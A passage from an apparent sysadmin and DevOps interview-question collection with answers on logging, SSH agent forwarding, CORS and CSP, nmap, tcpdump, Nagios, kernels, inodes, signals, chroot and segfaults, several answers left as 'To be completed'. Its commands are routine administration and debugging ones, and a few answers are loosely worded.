badhosts -T delete 1.2.3.4 ``` </details> <details> <summary><b>When does the web server like Apache or Nginx write info to log file? Before or after serving the request?</b></summary><br> Both servers provides very comprehensive and flexible logging capabilities - for logging everything that happens on your server, from the initial request, through the URL mapping process, to the final resolution of the connection, including any errors that may have occurred in the process. **Apache** The Apache server access log records all requests processed by the server (after the request has been completed). **Nginx** NGINX writes information about client requests in the access log right after the request is processed. Useful resources: - [When does Apache log to access.log - before or after serving the request?](https://webmasters.stackexchange.com/questions/65566/when-does-apache-log-to-access-log-before-or-after-serving-the-request) - [nginx log request before processing](https://serverfault.com/questions/693049/nginx-log-request-before-processing) </details> <details> <summary><b>Analyse web server log and show only <code>5xx</code> http codes. What external tools do you use?</b></summary><br> ```bash tail -n 100 -f /path/to/logfile | grep "HTTP/[1-2].[0-1]\" [5]" ``` Examples of http/https log management tools: - **goaccess** - is an open source real-time web log analyzer and interactive viewer that runs in a terminal in *nix systems or through your browser - **graylog** - is a free and open-source log management platform that supports in-depth log collection and analysis Useful resources: - [Best Log Management Tools: 51 Useful Tools for Log Management, Monitoring, Analytics, and More](https://stackify.com/best-log-management-tools/) </details> <details> <summary><b>Developer uses private key on the server to deploy app through ssh. Why it is incorrect behavior and what is the better (but not ideal) solution in such situations?</b></summary><br> You have the private key for your personal account. The server needs your public key so that it can verify that your private key for the account you are trying to use is authorized. The whole point with private keys is that they are private, meaning only you have your private key. If someone takes over your private key, it will be able to impersonate you any time he wants. A better solutions is the use of ssh key forwarding. An essence, you need to create a `~/.ssh/config` file, if it doesn't exist. Then, add the hosts (either domain name or IP address in the file and set `ForwardAgent yes`). Example: ```bash Host git.example.com User john PreferredAuthentications publickey IdentityFile ~/.ssh/id_rsa.git.example.com ForwardAgent yes ``` Your remote server must allow SSH agent forwarding on inbound connections and your local `ssh-agent` must be running. Forwarding an ssh agent carries its own security risk. If someone on the remote machine can gain access to your forwarded ssh agent connection, they can still make use of your keys. However, this is better than storing keys on remote machines: the attacker can only use the ssh agent connection, not the key itself. Thus, only while you're logged into the remote machine can they do anything. If you store the key on the remote machine, they can make a copy of it and use it whenever they want. If you use ssh keys remember about passphrases which is strongly recommended to reduce risk of keys accidentally leaking. Useful resources: - [How to forward local keypair in a SSH session?](https://stackoverflow.com/questions/12257968/how-to-forward-local-keypair-in-a-ssh-session) - [Using SSH agent forwarding](https://developer.github.com/v3/guides/using-ssh-agent-forwarding/) - [SSH Agent Forwarding considered harmful](https://heipei.github.io/2015/02/26/SSH-Agent-Forwarding-considered-harmful/) - [Security Consideration while using ssh-agent](https://www.commandprompt.com/blog/security_considerations_while_using_ssh-agent/) </details> <details> <summary><b>What is the difference between CORS and CSPs?</b></summary><br> **CORS** allows the **Same Origin Policy** to be relaxed for a domain. e.g. normally if the user logs into both `example.com` and `example.org`, the Same Origin Policy prevents `example.com` from making an AJAX request to `example.org/current_user/full_user_details` and gaining access to the response. This is the default policy of the web and prevents the user's data from being leaked when logged into multiple sites at the same time. Now with **CORS**, `example.org` could set a policy to say it will allow the origin `https://example.com` to read responses made by AJAX. This would be done if both `example.com` and `example.org` are ran by the same company and data sharing between the origins is to be allowed in the user's browser. It only affects the client-side of things, not the server-side. **CSPs** on the other hand set a policy of what content can run on the current site. For example, if JavaScript can be executed inline, or which domains `.js` files can be loaded from. This can be beneficial to act as another line of defense against **XSS** attacks, where the attacker will try and inject script into the HTML page. Normally output would be encoded, however say the developer had forgotten only on one output field. Because the policy is preventing in-line script from executing, the attack is thwarted. Useful resources: - [What is the difference between CORS and CSPs? (original)](https://stackoverflow.com/questions/39488241/what-is-the-difference-between-cors-and-csps) - [CSP, SRI and CORS](https://colorblindprogramming.com/csp-sri-and-cors) </details> <details> <summary><b>Explain four types of responses from firewall when scanning with <code>nmap</code>.</b></summary><br> There might be four types of responses: - **Open port** - few ports in the case of the firewall - **Closed port** - most ports are closed because of the firewall - **Filtered** - `nmap` is not sure whether the port is open or not - **Unfiltered** - `nmap` can access the port but is still confused about the open status of the port Useful resources: - [NMAP - Closed vs Filtered](https://security.stackexchange.com/questions/182504/nmap-closed-vs-filtered) </details> <details> <summary><b>What does a <code>tcpdump</code> do? How to capture only incoming traffic to your interface?</b></summary><br> `tcpdump` is a most powerful and widely used command-line packets sniffer or package analyzer tool which is used to capture or filter TCP/IP packets that received or transferred over a network on a specific interface. `tcpdump` puts your network card into promiscuous mode, which basically tells it to accept every packet it receives. It allows the user to see all traffic being passed over the network. Wireshark uses pcap to capture packets. If you want to view only packets that come to your interface you should: - `-Q in` - for Linux `tcpdump` version - `-D in` - for BSD `tcpdump` version Both params set send/receive direction direction for which packets should be captured. ```bash tcpdump -nei eth0 -Q in host 192.168.252.125 and port 8080 ``` </details> ###### Devops Questions (7) <details> <summary><b>Which are the top DevOps tools? Which tools have you worked on?</b></summary><br> The most popular DevOps tools are mentioned below: - **Git** : Version Control System tool - **Jenkins** : Continuous Integration tool - **Selenium** : Continuous Testing tool - **Puppet**, **Chef**, **Ansible** : Configuration Management and Deployment tools - **Nagios** : Continuous Monitoring tool - **Docker** : Containerization tool </details> <details> <summary><b>How do all these tools work together?</b></summary><br> The most popular DevOps tools are mentioned below: - Developers develop the code and this source code is managed by Version Control System tools like Git etc. - Developers send this code to the Git repository and any changes made in the code is committed to this Repository - Jenkins pulls this code from the repository using the Git plugin and build it using tools like Ant or Maven - Configuration management tools like puppet deploys & provisions testing environment and then Jenkins releases this code on the test environment on which testing is done using tools like selenium - Once the code is tested, Jenkins send it for deployment on the production server (even production server is provisioned & maintained by tools like puppet) - After deployment It is continuously monitored by tools like Nagios - Docker containers provides testing environment to test the build features </details> <details> <summary><b>What are playbooks in Ansible?</b></summary><br> Playbooks are Ansible’s configuration, deployment, and orchestration language. They can describe a policy you want your remote systems to enforce, or a set of steps in a general IT process. Playbooks are designed to be human-readable and are developed in a basic text language. At a basic level, playbooks can be used to manage configurations of and deployments to remote machines. </details> <details> <summary><b>What is NRPE (Nagios Remote Plugin Executor) in Nagios?</b></summary><br> The **NRPE** addon is designed to allow you to execute Nagios plugins on remote Linux/Unix machines. The main reason for doing this is to allow Nagios to monitor "local" resources (like CPU load, memory usage, etc.) on remote machines. Since these public resources are not usually exposed to external machines, an agent like **NRPE** must be installed on the remote Linux/Unix machines. </details> <details> <summary><b>What is the difference between Active and Passive check in Nagios?</b></summary><br> The major difference between Active and Passive checks is that Active checks are initiated and performed by Nagios, while passive checks are performed by external applications. Passive checks are useful for monitoring services that are: - asynchronous in nature and cannot be monitored effectively by polling their status on a regularly scheduled basis. - located behind a firewall and cannot be checked actively from the monitoring host. The main features of Actives checks are as follows: - active checks are initiated by the Nagios process. - active checks are run on a regularly scheduled basis. </details> <details> <summary><b>How to <code>git clone</code> including submodules?</b></summary><br> For example: ```bash # With -j8 - performance optimization git clone --recurse-submodules -j8 git://github.com/foo/bar.git # For already cloned repos or older Git versions git clone git://github.com/foo/bar.git cd bar git submodule update --init --recursive ``` </details> <details> <summary><b>Mention what are the advantages of using Redis? What is <code>redis-cli</code>? </b></summary><br> - it provides high speed (exceptionally faster than others) - it supports a server-side locking - it has got lots of client lib - it has got command level Atomic Operation (tx operation) - supports for rich data types like hashes, sets, bitmaps `redis-cli` is the **Redis** command line interface, a simple program that allows to send commands to **Redis**, and read the replies sent by the server, directly from the terminal. Useful resources: - [10 Advantages of Redis](https://dzone.com/articles/10-traits-of-redis) </details> ###### Cyber Security Questions (4) <details> <summary><b>What is XSS, how will you mitigate it?</b></summary><br> **Cross Site Scripting** is a JavaScript vulnerability in the web applications. The easiest way to explain this is a case when a user enters a script in the client side input fields and that input gets processed without getting validated. This leads to untrusted data getting saved and executed on the client side. Countermeasures of XSS are input validation, implementing a CSP (Content security policy) and other. </details> <details> <summary><b>HIDS vs NIDS and which one is better and why?</b></summary><br> **HIDS** is host intrusion detection system and **NIDS** is network intrusion detection system. Both the systems work on the similar lines. It’s just that the placement in different. **HIDS** is placed on each host whereas **NIDS** is placed in the network. For an enterprise, **NIDS** is preferred as **HIDS** is difficult to manage, plus it consumes processing power of the host as well. </details> <details> <summary><b>What is compliance?</b></summary><br> Abiding by a set of standards set by a government/Independent party/organisation, e.g. an industry which stores, processes or transmits Payment related information needs to be complied with PCI DSS (Payment card Industry Data Security Standard). Other compliance examples can be an organisation complying with its own policies. </details> <details> <summary><b>What is a WAF and what are its types?</b></summary><br> **WAF** stands for web application firewall. It is used to protect the application by filtering legitimate traffic from malicious traffic. **WAF** can be either a box type or cloud based. </details> ### :diamond_shape_with_a_dot_inside: <a name="senior-sysadmin">Senior Sysadmin</a> ###### System Questions (61) <details> <summary><b>Explain the current architecture you’re responsible for and point out where it’s scalable or fault-tolerant. ***</b></summary><br> To be completed. </details> <details> <summary><b>Tell me how code gets deployed in your current production. ***</b></summary><br> To be completed. </details> <details> <summary><b>What are the different types of kernels? Explain.</b></summary><br> **Monolithic Kernels** Earlier in this type of kernel architecture, all the basic system services like a process and memory management, interrupt handling etc were packaged into a single module in kernel space. This type of architecture led to some serious drawbacks like: - the size of the kernel, which was huge - poor maintainability, which means bug fixing or addition of new features resulted in recompilation of the whole kernel which could consume hours In a modern day approach to monolithic architecture, the kernel consists of different modules which can be dynamically loaded and unloaded. This modular approach allows easy extension of OS's capabilities. With this approach, maintainability of kernel became very easy as only the concerned module needs to be loaded and unloaded every time there is a change or bug fix in a particular module. Linux follows the monolithic modular approach. **Microkernels** This architecture majorly caters to the problem of ever growing size of kernel code which we could not control in the monolithic approach. This architecture allows some basic services like device driver management, protocol stack, file system etc to run in user space. In this architecture, all the basic OS services which are made part of user space are made to run as servers which are used by other programs in the system through inter process communication (IPC). Example: We have servers for device drivers, network protocol stacks, file systems, graphics, etc. Microkernel servers are essentially daemon programs like any others, except that the kernel grants some of them privileges to interact with parts of physical memory that are otherwise off limits to most programs. **Hybrid Kernels (Modular Kernels)** This is a combination of the above two, where the key idea is that Operating System services are in Kernel Space, and there is no message passing, no performance overhead and no reliability benefits, of having services in user space. This is used by Microsoft's NT kernels, all the way up to the latest Windows version. Useful resources: - [An Introduction to Kernels. The Heart of Computing Devices. (original)](https://keetmalin.wixsite.com/keetmalin/single-post/2017/08/24/An-Introduction-to-Kernels-The-Heart-of-Computing-Devices) </details> <details> <summary><b>The program returns the error of the missing library. How to provide dynamically linkable libraries?</b></summary><br> Environment variable `LD_LIBRARY_PATH` is a colon-separated set of directories where libraries should be searched for first, before the standard set of directories; this is useful when debugging a new library or using a nonstandard library for special purposes. The best way to use `LD_LIBRARY_PATH` is to set it on the command line or script immediately before executing the program. This way the new `LD_LIBRARY_PATH` isolated from the rest of your system. Example of use: ```bash export LD_LIBRARY_PATH="/list/of/library/paths:/another/path" ./program ``` Useful resources: - [How to correctly use LD_LIBRARY_PATH](http://wiredrevolution.com/system-administration/how-to-correctly-use-ld_library_path) </details> <details> <summary><b>Write the most important rules for using root privileges safely for novice administrators. ***</b></summary><br> To be completed. </details> <details> <summary><b>What is the advantage of synchronizing UID/GID across multiple systems?</b></summary><br> There are several principle reasons why you want to co-ordinate the **user/UID** and **group/GID** management across your network. The first is relatively obvious - it has to do with user and administrative convenience. If each of your users are expected to have relatively uniform access to the systems throughout the network, then they'll expect the same username and password to work on each system that they are supposed to use. If they change their password they will expect that change to be global. It also has a relationship with names and group names in Unix and Linux. They are mapped into numeric forms (**UID's** and **GID's** respectively). All file ownership (inodes) and processes use these numerics for all access and identity determination throughout the kernel and drivers. These numeric values are reverse mapped back to their corresponding principle symbolic representations (the names) by the utilities that display or process that information. It is also recommended that you adopt a policy that **UID's** are not re-used. When a user leaves your organization you "retire" their **UID** (disabling their access by \*'ing out their passwd, removing them from the groups maps, setting their "shell" to some `/bin/denied` binary and their home directory to a secured _graveyard_ - I use `/home/.graveyard` on my systems). The reason for this may not be obvious. However, if you are maintaining archival backups for several years (or indefinitely) you'll want to avoid any ambiguities and confusion that might result from restoring one (long gone) user's files and finding them owned by one of your new users. Useful resources: - [UID/GID Synchronization and Management (original)](https://linuxgazette.net/issue31/tag_uidgid.html) - [What's the advantage of synchronizing UID/GID across Linux machines?](https://serverfault.com/questions/603987/whats-the-advantage-of-synchronizing-uid-gid-across-linux-machines) - [How can I keep user accounts consistent across multiple machines?](https://unix.stackexchange.com/questions/141023/how-can-i-keep-user-acccounts-consistent-accross-multiple-machines) </details> <details> <summary><b>What principles to follow for successful system performance tuning? ***</b></summary><br> To be completed. Useful resources: - [An Introduction to Performance Tuning](https://www.oreilly.com/library/view/system-performance-tuning/059600284X/ch01.html) </details> <details> <summary><b>Describe start-up configuration files and directory in BSD systems.</b></summary><br> In BSD the primary start-up configuration file is `/etc/defaults/rc.conf`. System startup scripts such as `/etc/rc` and `/etc/rc.d` just include this file. If you want to add other programs to system startup you need to change `/etc/rc.conf` file instead of `/etc/defaults/rc.conf`. </details> <details> <summary><b>CPU spent the most of the time for a IO operations to complete. Which tools do you use for diagnose what process(es) did exactly wait for IO? How to minimize IO wait time? ***</b></summary><br> To be completed. Useful resources: - [Can anyone explain precisely what IOWait is?](https://serverfault.com/questions/12679/can-anyone-explain-precisely-what-iowait-is) </details> <details> <summary><b>The Junior dev accidentally destroyed production database. How can you prevent such situations?</b></summary><br> **Create disaster recovery plan** Disaster recovery and business continuity planning are integral parts of the overall risk management for an organization. Is a documented process or set of procedures to recover and protect a business IT infrastructure. If you don’t have a recovery solution, then your restoration efforts will become rebuilding efforts, starting from scratch to recreate whatever was lost. You should use commonly occurring real life data disaster scenarios to simulate what your backups will and won’t do in a crisis. **Create disaster recovery center** As a result, in the event of unplanned interruptions in the functioning of the primary location, service and all operational activities are switched to the backup center and therefore the unavailability of services is limited to the absolute minimum. Does the facility have sufficient bandwidth options and power to scale and deal with the increased load during a major disaster? Are resources available to periodically test failover? **Create regular backups and tested it!** Backups are a way to protect the investment in data. By having several copies of the data, it does not matter as much if one is destroyed (the cost is only that of the restoration of the lost data from the backup). When you lose data, one thing is certain: downtime. To assure the validity and integrity of any backup, it's essential to carry out regular restoration tests. Ideally, a test should be conducted after every backup completes to ensure data can be successfully secured and recovered. However, this often isn't practical due to a lack of available resources or time constraints. Make backups of entire virtual machines and important components in the middle of them. **Create snapshots: vm, disks or lvm** Snapshots are perfect if you want to recover a server from a previous state but it's only a "quick method", it cannot restore the system after too many items changed. Create them always before making changes on production environments (and not only). Disk snapshots are used to generate a snapshot of an entire disk. These snapshots don't make it easy to restore individual chunks of data (e.g. a lost user account), though it's possible. The primary purpose is to restore entire disks in case of disk failure. The LVM snapshots can be primarily used to easily copy data from production environment to staging environment. Remember: Snapshots are not backups! **Development and testing environments** A production environment is the real instance of the application and its database used by the company or the clients. The production database has all the real data. Setting up development environments based directly on the production database, instead of using a backup for this (removing the need for the above). Dev and test environment that your engineers can get to and a prod environment that only a few people can push updates to following an approved change. All environments such as prod, dev and test should have one major difference: authorization data for services. For example postgres database instance on testing environment should be consistent (if possible) with the production base, however, in order to eliminate errors of database names and logins and passwords for authorization should be different. **Single point of failure** The general method to avoid single points of failures is to provide redundant components for each necessary resource, so service can continue if a component fails. **Synchronization and replication process for databases** The replication procedure is super fragile and prone to error. A good idea is also slightly longer delay of data replication (e.g. for DRC). As in replicas, the data changes will usually be replicated within minutes, so the lost data won’t be on the replica database either once that happens. **Create database model with users, roles and rights, use different methods of protection** Only very advanced devs have permissions for db admin access. The other really don't need write access to clone a database. On the other hand just don't give a developer write access to prod. The production database should refuse connections from any server and pc which isn't the one running the production application, even if it provides a valid username/password. How the hell development machines can access a production database right like that? How about a simple firewall rule to just let the servers needing the DB data access the database? **Create summary/postmortem documents after failures** The post-mortem audience includes customers, direct reports, peers, the company's executive team and often investors. Explain what caused the outage on a timeline. Every incident begins with a specific trigger at a specific time, which often causes some unexpected behavior. For example, our servers were rebooted and we expected them to come back up intact, which didn't happen. Furthermore, every incident has a root cause: the reboot itself was trigger, however a bug in the driver caused the actual outage. Finally, there are consequences to every incident, the most obvious one is that the site goes down. The post-mortem answers the single most important question of what could have prevented the outage. Despite how painful an outage may have been, the worst thing you can do is to bury it and never properly close the incident in a clear and transparent way. **If you also made a big mistake...** > "*Humans are just apes with bigger computers.*" - african_cheetah (Reddit) > > "*I've come to appreciate not having access to things I don't absolutely need.*" - warm_vanilla_sugar (Reddit) > > Document whatever happened somewhere. Write setup guides. Failure is instructive. Useful resources: - [Accidentally destroyed production database on first day of a job...](https://www.reddit.com/r/cscareerquestions/comments/6ez8ag/accidentally_destroyed_production_database_on/) - [Postmortem of database outage of January 31](https://about.gitlab.com/2017/02/10/postmortem-of-database-outage-of-january-31/) - [How to write an Incident Report/Postmortem](https://sysadmincasts.com/episodes/20-how-to-write-an-incident-report-postmortem) </details> <details> <summary><b>How to add new disk in Linux server without rebooting? How to rescan and add it in LVM?</b></summary><br> To be completed. Useful resources: - [How to Add New Disk in Linux CentOS 7 Without Rebooting](https://linoxide.com/linux-how-to/add-new-disk-centos-7-without-rebooting/) </details> <details> <summary><b>Explain each system calls used for process management in Linux.</b></summary><br> There are some system calls for process management. These are as follows: - `fork()`: it is used to create a new process - `exec()`: it is used to execute a new process - `wait()`: it is used to make the process to wait - `exit()`: it is used to exit or terminate the process - `getpid()`: it is used to find the unique process ID - `getppid()`: it is used to check the parent process ID - `nice()`: it is used to bias the currently running process property Useful resources: - [System Calls](http://faculty.salina.k-state.edu/tim/ossg/Introduction/sys_calls.html) </details> <details> <summary><b>Can’t mount the root file system. Why? ***</b></summary><br> To be completed. Useful resources: - [What does "mounting a root file system" mean exactly?](https://superuser.com/questions/193918/what-does-mounting-a-root-file-system-mean-exactly) - [How does a kernel mount the root partition?](https://unix.stackexchange.com/questions/9944/how-does-a-kernel-mount-the-root-partition) </details> <details> <summary><b>You have to delete 100GB files. Which method will be the most optimal? ***</b></summary><br> To be completed. Useful resources: - [Is there a way to delete 100GB file on Linux without thrashing IO/load?](https://serverfault.com/questions/336917/is-there-a-way-to-delete-100gb-file-on-linux-without-thrashing-io-load) - [rm on a directory with millions of files](https://serverfault.com/questions/183821/rm-on-a-directory-with-millions-of-files) </details> <details> <summary><b>Explain interrupts and interrupt handlers in Linux.</b></summary><br> Here's a high-level view of the low-level processing. I'm describing a simple typical architecture, real architectures can be more complex or differ in ways that don't matter at this level of detail. When an **interrupt** occurs, the processor looks if interrupts are masked. If they are, nothing happens until they are unmasked. When interrupts become unmasked, if there are any pending interrupts, the processor picks one. Then the processor executes the interrupt by branching to a particular address in memory. The code at that address is called the **interrupt handler**. When the processor branches there, it masks interrupts (so the interrupt handler has exclusive control) and saves the contents of some registers in some place (typically other registers). The interrupt handler does what it must do, typically by communicating with the peripheral that triggered the interrupt to send or receive data. If the interrupt was raised by the timer, the handler might trigger the OS scheduler, to switch to a different thread. When the handler finishes executing, it executes a special return-from-interrupt instruction that restores the saved registers and unmasks interrupts. The interrupt handler must run quickly, because it's preventing any other interrupt from running. In the Linux kernel, interrupt processing is divided in two parts: - The "top half" is the interrupt handler. It does the minimum necessary, typically communicate with the hardware and set a flag somewhere in kernel memory. - The "bottom half" does any other necessary processing, for example copying data into process memory, updating kernel data structures, etc. It can take its time and even block waiting for some other part of the system since it runs with interrupts enabled. Useful resources: - [How is an Interrupt handled in Linux? (original)](https://unix.stackexchange.com/questions/5788/how-is-an-interrupt-handled-in-linux) - [Interrupts and Interrupt Handlers](https://notes.shichao.io/lkd/ch7/) </details> <details> <summary><b>What considerations come into play when designing a highly available application, both at the architecture level and the application level? ***</b></summary><br> To be completed. </details> <details> <summary><b>What fields are stored in an inode?</b></summary><br> Within a POSIX system, a file has the following attributes which may be retrieved by the stat system call: - **Device ID** (this identifies the device containing the file; that is, the scope of uniqueness of the serial number). File serial numbers - The **file mode** which determines the file type and how the file's owner, its group, and others can access the file - A **link count** telling how many hard links point to the inode - The **User ID** of the file's owner - The **Group ID** of the file - The **device ID** of the file if it is a device file. - The **size of the file** in bytes - **Timestamps** telling when the inode itself was last modified (ctime, inode change time), the file content last modified (mtime, modification time), and last accessed (atime, access time) - The preferred **I/O block size** - The **number of blocks** allocated to this file Useful resources: - [Inodes - an Introduction](http://www.grymoire.com/Unix/Inodes.html) </details> <details> <summary><b>Ordinary users are able to read <code>/etc/passwd</code>. Is it a security hole? Do you know other password shadowing scheme?</b></summary><br> Typically, the _hashed passwords_ are stored in `/etc/shadow` on most Linux systems: ```bash -rw-r----- 1 root shadow 1349 2016-07-03 03:54 /etc/shadow ``` They are stored in `/etc/master.passwd` on BSD systems. Programs that need to perform authentication still need to run with `root` privileges: ```bash -rwsr-xr-x 1 root root 42792 2016-02-14 14:13 /usr/bin/passwd ``` If you dislike the `setuid root` programs and one single file containing all the hashed passwords on your system, you can replace it with the **Openwall TCB PAM module**. This provides every single user with their own file for storing their hashed password - as a result the number of `setuid root` programs on the system can be drastically reduced. Useful resources: - [Ordinary users are able to read /etc/passwd, is this a security hole? (original)](https://serverfault.com/questions/286654/ordinary-users-are-able-to-read-etc-passwd-is-this-a-security-hole/286657#286657) - [tcb - the alternative to /etc/shadow](https://www.openwall.com/tcb/) - [Why shadow your passwd file?](https://www.tldp.org/HOWTO/Shadow-Password-HOWTO-2.html) </details> <details> <summary><b>What are some of the benefits of using systemd over SysV init? ***</b></summary><br> To be completed. </details> <details> <summary><b>How do you run command every time a file is modified?</b></summary><br> For example: ```bash while inotifywait -e close_write filename ; do echo "changed" >> /var/log/changed done ``` </details> <details> <summary><b>You need to copy a large amount of data. Explain the most effective way. ***</b></summary><br> To be completed. Useful resources: - [Copying a large directory tree locally? cp or rsync?](https://serverfault.com/questions/43014/copying-a-large-directory-tree-locally-cp-or-rsync) </details> <details> <summary><b>Tell me about the dangers and caveats of LVM.</b></summary><br> **Risks of using LVM** - Vulnerable to write caching issues with SSD or VM hypervisor - Harder to recover data due to more complex on-disk structures - Harder to resize filesystems correctly - Snapshots are hard to use, slow and buggy - Requires some skill to configure correctly given these issues Useful resources: - [LVM dangers and caveats (original)](https://serverfault.com/questions/279571/lvm-dangers-and-caveats) </details> <details> <summary><b>Python dev team in your company have a dilemma what to choose: uwsgi or gunicorn. What are the pros/cons of each of the solutions from the admin's perspective? ***</b></summary><br> To be completed. Useful resources: - [uWSGI vs. Gunicorn, or How to Make Python Go Faster than Node](https://blog.kgriffs.com/2012/12/18/uwsgi-vs-gunicorn-vs-node-benchmarks.html) </details> <details> <summary><b>What if <code>kill -9</code> does not work? Describe exceptions for which the use of SIGKILL is insufficient.</b></summary><br> `kill -9` (`SIGKILL`) always works, provided you have the permission to kill the process. Basically either the process must be started by you and not be setuid or setgid, or you must be root. There is one exception: even root cannot send a fatal signal to PID 1 (the init process). However `kill -9` is not guaranteed to work immediately. All signals, including `SIGKILL`, are delivered asynchronously: the kernel may take its time to deliver them. Usually, delivering a signal takes at most a few microseconds, just the time it takes for the target to get a time slice. However, if the target has blocked the signal, the signal will be queued until the target unblocks it. Normally, processes cannot block `SIGKILL`. But kernel code can, and processes execute kernel code when they call system calls. A process blocked in a system call is in uninterruptible sleep. The `ps` or `top` command will (on most unices) show it in state **D**. To remove a **D** State Process, since it is uninterruptible, only a machine reboot can solve the problem in case its not automatically handled by the system. Usually there is a very few chance that a process stays in **D** State for long. And if it does then there is something not properly being handled in the system. This can be a potential bug as well. A classical case of long uninterruptible sleep is processes accessing files over NFS when the server is not responding; modern implementations tend not to impose uninterruptible sleep (e.g. under Linux, the intr mount option allows a signal to interrupt NFS file accesses). You may sometimes see entries marked **Z** (or **H** under Linux) in the `ps` or `top` output. These are technically not processes, they are zombie processes, which are nothing more than an entry in the process table, kept around so that the parent process can be notified of the death of its child. They will go away when the parent process pays attention (or dies). Summary exceptions: - Zombie processes cannot be killed since they are already dead and waiting for their parent processes to reap them - Processes that are in the blocked state will not die until they wake up again - The init process is special: It does not get signals that it does not want to handle, and thus it can ignore **SIGKILL**. An exception from this exception is while init is ptraced on Linux - An uninterruptibly sleeping process may not terminate (and free its resources) even when sent **SIGKILL**. This is one of the few cases in which a Unix system may have to be rebooted to solve a temporary software problem Useful resources: - [What if kill -9 does not work? (original)](https://unix.stackexchange.com/questions/5642/what-if-kill-9-does-not-work) - [How to kill a process in Linux if kill -9 has no effect](https://serverfault.com/questions/458261/how-to-kill-a-process-in-linux-if-kill-9-has-no-effect) - [When should I not kill -9 a process?](https://unix.stackexchange.com/questions/8916/when-should-i-not-kill-9-a-process) - [SIGTERM vs. SIGKILL](https://major.io/2010/03/18/sigterm-vs-sigkill/) </details> <details> <summary><b>Difference between <code>nohup</code>, <code>disown</code>, and <code>&</code>. What happens when using all together?</b></summary><br> - `&` puts the job in the background, that is, makes it block on attempting to read input, and makes the shell not wait for its completion - `disown` removes the process from the shell's job control, but it still leaves it connected to the terminal. One of the results is that the shell won't send it a **SIGHUP**. Obviously, it can only be applied to background jobs, because you cannot enter it when a foreground job is running - `nohup` disconnects the process from the terminal, redirects its output to `nohup.out` and shields it from **SIGHUP**. One of the effects (the naming one) is that the process won't receive any sent **SIGHUP**. It is completely independent from job control and could in principle be used also for foreground jobs (although that's not very useful) If you use all three together, the process is running in the background, is removed from the shell's job control and is effectively disconnected from the terminal. Useful resources: - [Difference between nohup, disown and & (original)](https://unix.stackexchange.com/questions/3886/difference-between-nohup-disown-and) </details> <details> <summary><b>What is the main advantage of using <code>chroot</code>? When and why do we use it? What is the purpose of the mount dev, proc, sys in a chroot environment?</b></summary><br> An advantage of having a chroot environment is the file-system is totally isolated from the physical host. `chroot` has a separate file-system inside the file-system, the difference is its uses a newly created root(/) as its root directory. A chroot jail is a way to isolate a process and its children from the rest of the system. It should only be used for processes that don't run as root, as root users can break out of the jail very easily. The idea is that you create a directory tree where you copy or link in all the system files needed for a process to run. You then use the `chroot()` system call to change the root directory to be at the base of this new tree and start the process running in that chroot'd environment. Since it can't actually reference paths outside the modified root, it can't perform operations (read/write etc.) maliciously on those locations. On Linux, using a bind mounts is a great way to populate the chroot tree. Using that, you can pull in folders like `/lib` and `/usr/lib` while not pulling in `/usr`, for example. Just bind the directory trees you want to directories you create in the jail directory. Chroot environment is useful for: - reinstall bootloader - reset a forgotten password - perform a kernel upgrade (or downgrade) - rebuild your initramdisk - fix your **/etc/fstab** - reinstall packages using your package manager - whatever When working in a chrooted environment, there is a few special file systems that needs to be mounted so all programs behave properly. Limitation is that `/dev`, `/sys` and `/proc` are not mounted by default but needed for many tasks. Useful resources: - [Its all about Chroot](https://medium.com/@itseranga/chroot-316dc3c89584) - [Best Practices for UNIX chroot() Operations](http://www.unixwiz.net/techtips/chroot-practices.html) - [Is there an easier way to chroot than bind-mounting?](https://askubuntu.com/questions/32418/is-there-an-easier-way-to-chroot-than-bind-mounting) - [What's the proper way to prepare chroot to recover a broken Linux installation?](https://superuser.com/questions/111152/whats-the-proper-way-to-prepare-chroot-to-recover-a-broken-linux-installation) </details> <details> <summary><b>What are segmentation faults (segfaults), and how can identify what's causing them?</b></summary><br> A **segmentation fault** (aka _segfault_) is a common condition that causes programs to crash. Segfaults are caused by a program trying to read or write an illegal memory location. Program memory is divided into different segments: - a text segment for program instructions - a data segment for variables and arrays defined at compile time - a stack segment for temporary (or automatic) variables defined in subroutines and functions - a heap segment for variables allocated during runtime by functions, such as `malloc` (in C) In practice, segfaults are almost always due to trying to read or write a non-existent array element, not properly defining a pointer before using it, or (in C programs) accidentally using a variable's value as an address. Thus, when Process A reads memory location 0x877, it reads information residing at a different physical location in RAM than when Process B reads its own 0x877. All modern operating systems support and use segmentation, and so all can produce a segmentation fault. Segmentation fault can also occur under following circumstances: - a buggy program/command, which can be only fixed by applying patch - it can also appear when you try to access an array beyond the end of an array under C programming - inside a chrooted jail this can occur when critical shared libs, config file or `/dev/` entry missing - sometime hardware or faulty memory or driver can also create problem - maintain suggested environment for all computer equipment (overheating can also generate this problem) To debug this kind of error try one or all of the following techniques: - enable core files: `$ ulimit -c unlimited` - reproduce the crash: `$ ./<program>` - debug crash with gdb: `$ gdb <program> [core file]` - or run `LD_PRELOAD=...path-to.../libSegFault.so <program>` to get a report with backtrace, loaded libs, etc Also: - make sure correct hardware installed and configured - always apply all patches and use updated system - make sure all dependencies installed inside jail - turn on core dumping for supported services such as Apache - use `strace` which is a useful diagnostic, instructional, and debugging tool Sometimes segmentation faults are not caused by bugs in the program but are caused instead by system memory limits being set too low. Usually it is the limit on stack size that causes this kind of problem (stack overflows). To check memory limits, use the `ulimit` command in bash. Useful resources: - [What are segmentation faults (segfaults), and how can I identify what's causing them? (original)](https://kb.iu.edu/d/aqsj) - [What is a segmentation fault on Linux?](https://stackoverflow.com/questions/3200526/what-is-a-segmentation-fault-on-linux) - [Segmentation fault when calling a recursive bash function](https://unix.stackexchange.com/questions/296641/segmentation-fault-when-calling-a-recursive-bash-function) - [Troubleshooting Segmentation Violations/Faults](http://web.mit.edu/10.001/Web/Tips/tips_on_segmentation.html) - [Can one use libSegFault.so to get backtraces for SIGABRT?](https://stackoverflow.com/questions/18706496/can-one-use-libsegfault-so-to-get-backtraces-for-sigabrt) </details> <details> <summary><b>One of the processes runs slowly. How to check how long has been running and which tools will you use?</b></summary><br> To be completed. Useful resources: - [How to check how long a process has been running?](https://unix.stackexchange.com/questions/7870/how-to-check-how-long-a-process-has-been-running) - [Linux how long a process has been running?](https://www.cyberciti.biz/faq/how-to-check-how-long-a-process-has-been-running/) - [How to see system call that executed in current time by process?](https://stackoverflow.com/questions/42677724/how-to-see-system-call-that-executed-in-current-time-by-process) </details> <details> <summary><b>What is a file descriptor in Linux?</b></summary><br> In Unix and related computer operating systems, a file descriptor (FD, less frequently fildes) is an abstract indicator (handle) used to access a file or other input/output resource, such as a pipe or network socket. File descriptors form part of the POSIX application programming interface. </details> <details> <summary><b>Which way of additionally feeding random entropy pool would you suggest for producing random passwords? How to improve 